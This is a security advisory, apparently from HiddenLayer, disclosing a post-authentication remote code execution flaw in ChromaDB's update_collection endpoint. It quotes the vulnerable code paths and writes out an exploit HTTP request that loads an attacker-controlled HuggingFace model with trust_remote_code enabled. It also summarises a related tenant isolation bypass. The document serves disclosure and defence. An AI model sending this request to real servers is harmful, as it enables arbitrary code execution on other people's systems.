Post-Authentication RCE via update_collection
June 12, 2026
CVE Number
CVE-2026-45833
Summary
Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.
Products Impacted
This vulnerability affects ChromaDB versions from 0.4.17 to the latest Python release.
CVSS Score: 9.4
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWE Categorization
CWE-94: Improper Control of Generation of Code (‘Code Injection’)
Details
In the V2 API the update_collection function (chromadb/server/fastapi/__init__.py:883-919):
def process_update_collection(
request: Request, collection_id: str, raw_body: bytes
) -> None:
update = validate_model(UpdateCollection, orjson.loads(raw_body))
self.sync_auth_request(
request.headers,
AuthzAction.UPDATE_COLLECTION,
tenant, database_name, collection_id,
)
configuration = (
None
if not update.new_configuration
else load_update_collection_configuration_from_json(
update.new_configuration # Dangerous code path
)
)
The load_update_collection_configuration_from_json() function (chromadb/api/collection_configuration.py:605-633) calls the identical build_from_config() method that the create_collection path uses:
if json_map.get("embedding_function") is not None:
# ...
ef = known_embedding_functions[json_map["embedding_function"]["name"]]
result["embedding_function"] = ef.build_from_config(
json_map["embedding_function"]["config"] # Model instantiation
)
This means trust_remote_code=True and a malicious model_name work identically through update_collection. The V1 variant at __init__.py:1920-1959 follows the same pattern: auth check at line 1932, config loading at line 1939-1944.
Exploit request, requires UPDATE_COLLECTION permission:
PUT /api/v2/tenants/default_tenant/databases/default_database/collections/{collection_id} HTTP/1.1
Authorization: Bearer <valid-token>
Content-Type: application/json
{
"new_configuration": {
"embedding_function": {
"name": "sentence_transformer",
"type": "known",
"config": {
"model_name": "attacker-org/backdoored-model",
"device": "cpu",
"normalize_embeddings": false,
"kwargs": {"trust_remote_code": true}
}
}
}
}
Timeline
- February 17th, 2026 - Initial disclosure to ChromaDB per their security page https://www.trychroma.com/security.
- February 24th, 2026 - Attempted follow up through other trychroma emails.
- March 5th, 2026 - Attempted contact through IT-ISAC.
- April 16th, 2026 - Attempted final follow up through all previous channels and social media.
- May 18th, 2026 - Publicly disclosed a first vulnerability, no response from the vendor.
Project URL:
https://github.com/chroma-core/chroma/
RESEARCHER: Esteban Tonglet, Security Researcher, HiddenLayer
Related SAI Security Advisory
June 12, 2026
Post-Authentication RCE via update_collection
Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.
June 12, 2026
V1 API Tenant Isolation Bypass via Null Tenant/Database Context
All V1 collection-level endpoints pass None for tenant and database to the authorization layer, making tenant-scoped access control impossible through V1, regardless of which authorization provider is configured. V1 cannot be disabled. Combined with CVE-2026-45830, any authenticated user has unrestricted read/write access to any collection by UUID through V1 endpoints.